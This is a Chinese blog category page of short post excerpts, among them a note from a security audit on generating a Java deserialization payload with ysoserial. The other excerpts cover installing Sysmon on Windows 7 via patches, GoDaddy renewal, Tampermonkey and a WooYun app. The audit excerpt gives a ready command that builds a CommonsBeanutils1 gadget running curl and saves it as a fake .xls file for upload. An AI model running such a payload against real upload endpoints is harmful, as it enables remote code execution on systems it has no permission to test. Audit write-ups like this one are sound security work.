分类目录归档:推荐软件

推荐软件-推荐实用软件

使用ysoserial生成反序列化payload文件

某次对业务进行审计发现存在一处反序列化漏洞(该漏洞形成的原因是会对上传文件引擎进行解析)

省去敏感部分,只记录一下过程。

可以直接通过github下载ysoserial-0.0.7-SNAPSHOT-all.jar

ysoserial-0.0.7-SNAPSHOT-all.jar支持多个生成payload的选项

具体适配哪个payload,还需要查看源码(如果有的情况下,没有源码的情况下只能逐个去尝试)

例如:

对应的是:

commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2

这块可以通过配置找到:(一般在pom.xml或者libraries.gradle文件配置里)

生成payload文件命令语法

java -jar ysoserial-0.0.7-SNAPSHOT-all.jar CommonsBeanutils1 “curl http://127.0.0.1:4444” > java.xls

继续阅读

win7安装sysmon报错

sysmon是一款微软自带的应用事件分析工具,win10都可以正常安装,虚拟机安装win7后,裸机安装提示:error getting the evt dll (wevtapi.dll): 87

网上搜了下,按照这个办法可以解决问题正常安装。

需要安装两个补丁,分别为

一共需要两个补丁,分别是KB2533623和KB3033929。

下载两个补丁回来以后,安装命令如下:

expand -f: *c:\buding\windows6.1-kb2533623-x64.msu c:\buding\

释放完文件以后通过dism.exe进行执行(此步骤需要管理员权限运行cmd)

dism.exe /online /add-package /packagepath:c:\buding\windows6.1-kb2533623-x64.cab

安装完以后需要重启电脑,默认y即可,重启完成后补丁生效。

KB3033929 安装方式同理。

最后win7安装成功截图:

查看事件均已有记录

godaddy域名续费优惠

一转眼,博客以及域名也经历了十年的时光。差点连我都快遗忘域名过期了,本着记录原则,将godaddy域名续费过程稍作记录一下。

又续了5年。

昨天很神奇的是,续费我的域名,一年竟然要2800.

不得已只能上网找是否有其他因素影响,通过知乎得知了,godaddy是有小程序的,而godaddy账户体系也是可以通过扫描微信二维码进行绑定,后续登录godaddy扫描微信二维码即可登录了。非常方便。

继续阅读

Tampermonkey–一款优雅的chrome扩展

Tampermonkey是一款基于js开发的chrome扩展程序,安装了Tampermonkey,相当于你拥有了第二个chrome商店(无需再次翻墙,便能体验到大量js功能给你带来的好处)。

官网:http://tampermonkey.net/

官网介绍(摘自部分介绍):

Tampermonkey 是一款免费的浏览器插件和最为流行的用户脚本管理器,它适用于基于 Blink 和 WebKit 的浏览器,像是 Chrome, Opera NextSafari继续阅读

乌云安全中心–随手了解最近安全热点事件

wooyun-sec-logo
一直期待乌云能出一个客户端,这不,千呼万唤总算始出来了。

目前上架的是IOS版,Android版本应该也在酝酿中。

kuaizhao
目前支持的功能:(选取来自应用介绍)

【乌云气象台】:你所关心的安全状况决定着你的安全气象,天晴下雨一目了然。全互联网紧急预警,你关心的企业漏洞一个不落及时送达,安全态势不含糊,实时状况全知道。

【我的厂商】:通过厂商搜索,关注你的所在厂商或合作厂商,乌云漏洞平台上 继续阅读